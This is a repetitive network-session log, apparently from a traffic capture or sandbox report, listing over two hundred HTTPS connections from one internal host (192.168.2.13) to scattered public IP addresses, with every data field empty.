                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14181192.168.2.1355962218.60.13.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14182192.168.2.1338898181.194.35.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14183192.168.2.135313096.64.209.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14184192.168.2.1335958169.41.218.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14185192.168.2.133681443.214.250.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14186192.168.2.1335474211.162.163.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14187192.168.2.133322466.58.8.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14188192.168.2.134364435.131.241.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14189192.168.2.133465443.25.165.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14190192.168.2.1351900165.63.200.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14191192.168.2.1334346121.58.128.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192192.168.2.1334430179.125.169.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14193192.168.2.134921025.98.28.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14194192.168.2.1347998109.99.125.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14195192.168.2.136017612.240.165.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14196192.168.2.135552687.152.187.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14197192.168.2.13415805.192.109.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14198192.168.2.1337954173.236.14.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14199192.168.2.1350174157.92.42.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14200192.168.2.135983074.165.89.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14201192.168.2.134043879.188.217.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14202192.168.2.135533897.21.248.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14203192.168.2.1356800158.15.166.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14204192.168.2.134279637.123.137.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14205192.168.2.1334636221.49.157.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14206192.168.2.1349718109.142.229.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14207192.168.2.1333374153.146.204.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14208192.168.2.133613644.179.37.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14209192.168.2.1338748129.162.113.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14210192.168.2.1345530186.184.212.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14211192.168.2.1349454218.85.187.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14212192.168.2.1342478218.230.208.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14213192.168.2.1358542207.50.178.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14214192.168.2.1347022195.87.152.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14215192.168.2.1355222193.59.84.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14216192.168.2.1339148111.240.65.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14217192.168.2.135981885.162.35.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14218192.168.2.1345306175.222.139.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14219192.168.2.1344832143.28.232.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14220192.168.2.1345056175.179.210.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14221192.168.2.134581460.111.164.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14222192.168.2.1359598165.237.247.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14223192.168.2.1356934165.197.6.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14224192.168.2.134818257.208.7.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14225192.168.2.1357588220.99.67.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14226192.168.2.1355210146.118.131.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14227192.168.2.1345372177.211.204.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14228192.168.2.134621645.216.186.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14229192.168.2.133909452.167.144.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14230192.168.2.1341126107.71.235.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14231192.168.2.1335232199.171.31.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14232192.168.2.1354534187.99.36.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14233192.168.2.1336138201.82.78.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14234192.168.2.1351786146.118.156.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14235192.168.2.135664083.220.45.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14236192.168.2.133558296.189.252.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14237192.168.2.1359104179.140.159.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14238192.168.2.1342192204.227.38.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14239192.168.2.1355494165.182.235.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14240192.168.2.135252424.234.125.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14241192.168.2.135049464.78.169.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14242192.168.2.1352966164.156.32.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14243192.168.2.1336952206.164.21.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14244192.168.2.135089473.141.185.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14245192.168.2.1340122199.215.210.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14246192.168.2.13379865.225.119.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14247192.168.2.134570070.82.17.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14248192.168.2.1340080109.222.210.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14249192.168.2.135256070.225.110.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14250192.168.2.1335914124.205.212.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14251192.168.2.1351120109.55.229.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14252192.168.2.1343558165.12.198.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14253192.168.2.135807481.114.131.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14254192.168.2.1341616163.57.42.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14255192.168.2.133486681.204.143.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14256192.168.2.1352848148.110.27.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14257192.168.2.1337908157.129.103.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14258192.168.2.1352526146.126.200.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14259192.168.2.1349240186.90.235.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14260192.168.2.1341754211.139.61.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14261192.168.2.134795039.198.105.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14262192.168.2.1339770167.224.251.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14263192.168.2.134370699.201.202.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14264192.168.2.133720051.48.112.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14265192.168.2.134601642.110.34.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14266192.168.2.1348936156.73.229.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14267192.168.2.135071442.130.140.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14268192.168.2.135171439.42.91.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14269192.168.2.135187053.255.73.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14270192.168.2.133404859.141.30.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14271192.168.2.133726239.172.32.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14272192.168.2.1350536223.146.65.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14273192.168.2.1350756116.22.233.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14274192.168.2.1334296153.24.188.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14275192.168.2.1346290169.18.18.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14276192.168.2.135774432.8.79.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14277192.168.2.134298461.216.187.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14278192.168.2.1342394107.20.177.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14279192.168.2.134476086.165.123.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14280192.168.2.1353074193.126.66.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14281192.168.2.133337468.34.223.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14282192.168.2.1335058213.9.109.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14283192.168.2.1344920221.44.33.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14284192.168.2.1345508219.128.152.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14285192.168.2.1338798195.63.63.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14286192.168.2.135655690.173.140.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14287192.168.2.135557049.38.163.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14288192.168.2.1341372106.167.47.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14289192.168.2.135136412.137.243.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14290192.168.2.1351876175.226.153.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14291192.168.2.1335430219.247.224.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14292192.168.2.1343468135.4.122.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14293192.168.2.1345424222.145.44.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14294192.168.2.134892274.174.235.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14295192.168.2.1356506118.133.12.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14296192.168.2.1346798129.47.205.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14297192.168.2.134351073.151.102.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14298192.168.2.136047675.95.24.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14299192.168.2.1343022141.129.130.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14300192.168.2.133475672.176.47.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14301192.168.2.135597474.24.5.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14302192.168.2.1351832108.245.26.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14303192.168.2.1356710223.203.190.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14304192.168.2.1355460176.74.219.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14305192.168.2.1334778158.179.152.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14306192.168.2.135207631.97.181.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14307192.168.2.135429435.160.86.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14308192.168.2.1345302168.226.5.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14309192.168.2.135219479.99.118.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14310192.168.2.133865435.205.160.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14311192.168.2.1333552139.0.98.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14312192.168.2.1360962111.11.178.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14313192.168.2.134370264.235.0.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14314192.168.2.1346516196.218.198.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14315192.168.2.135588449.134.190.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14316192.168.2.133290686.94.0.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14317192.168.2.1347526172.210.73.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14318192.168.2.13445049.19.136.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14319192.168.2.133934637.112.75.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14320192.168.2.134848652.198.168.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14321192.168.2.134132836.41.237.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14322192.168.2.134043478.115.36.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14323192.168.2.1344420171.86.47.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14324192.168.2.1334802176.115.231.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14325192.168.2.1340370160.219.38.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14326192.168.2.134759459.107.167.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14327192.168.2.1354700138.118.214.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14328192.168.2.1337444173.136.224.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14329192.168.2.1339568122.221.47.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14330192.168.2.133474054.75.142.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14331192.168.2.134790227.135.179.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14332192.168.2.135658634.175.168.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14333192.168.2.1354606220.171.52.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14334192.168.2.133786668.54.86.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14335192.168.2.135112477.226.110.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14336192.168.2.1342288144.167.173.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14337192.168.2.133845636.255.196.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14338192.168.2.1341138202.176.71.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14339192.168.2.1344670138.244.204.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14340192.168.2.133470638.66.229.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14341192.168.2.1339646153.126.212.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14342192.168.2.1357494113.211.30.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14343192.168.2.1333938154.60.221.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14344192.168.2.133869039.148.209.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14345192.168.2.136094878.255.212.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14346192.168.2.1337784116.80.39.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14347192.168.2.133866494.195.124.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14348192.168.2.134013879.40.246.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14349192.168.2.133408842.244.172.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14350192.168.2.134128663.232.19.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14351192.168.2.135350424.72.179.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14352192.168.2.135994627.147.236.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14353192.168.2.1350822158.71.110.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14354192.168.2.134914060.111.144.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14355192.168.2.1347808106.115.173.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14356192.168.2.134669612.255.185.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14357192.168.2.1340008179.191.90.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14358192.168.2.135814623.7.249.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14359192.168.2.133615265.48.209.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14360192.168.2.134847823.140.252.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14361192.168.2.133391244.143.184.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14362192.168.2.1336074134.40.35.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14363192.168.2.1340982178.28.81.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14364192.168.2.133939477.187.69.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14365192.168.2.134108614.242.145.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14366192.168.2.1360076130.107.120.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14367192.168.2.134010446.35.82.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14368192.168.2.133887054.4.40.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14369192.168.2.133745613.183.40.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14370192.168.2.135258476.120.231.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14371192.168.2.136033614.232.106.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14372192.168.2.1353474129.23.137.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14373192.168.2.1359432102.254.211.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14374192.168.2.134803888.51.135.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14375192.168.2.135006482.129.46.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14376192.168.2.133389095.175.254.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14377192.168.2.1354886192.28.65.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14378192.168.2.1359760182.30.194.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14379192.168.2.1333290150.135.140.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14380192.168.2.13491609.204.208.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14381192.168.2.133409086.237.105.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14382192.168.2.1336736223.236.229.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14383192.168.2.133721862.113.120.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14384192.168.2.1352614221.57.221.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14385192.168.2.135431674.222.19.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14386192.168.2.1356432107.201.60.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14387192.168.2.1345658118.50.158.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14388192.168.2.1356490146.131.226.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14389192.168.2.1357132188.110.10.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14390192.168.2.133387669.27.140.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14391192.168.2.1337224156.138.227.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14392192.168.2.1343190110.23.180.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14393192.168.2.1338206208.132.218.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14394192.168.2.1345594148.167.206.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14395192.168.2.135847681.75.188.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14396192.168.2.1342294153.117.77.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14397192.168.2.1354558154.37.11.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14398192.168.2.1349388173.0.21.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14399192.168.2.1360886142.151.124.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14400192.168.2.136076664.254.147.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14401192.168.2.133305050.161.222.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14402192.168.2.135515612.75.11.99443
                                                TimestampBytes transferredDirectionData


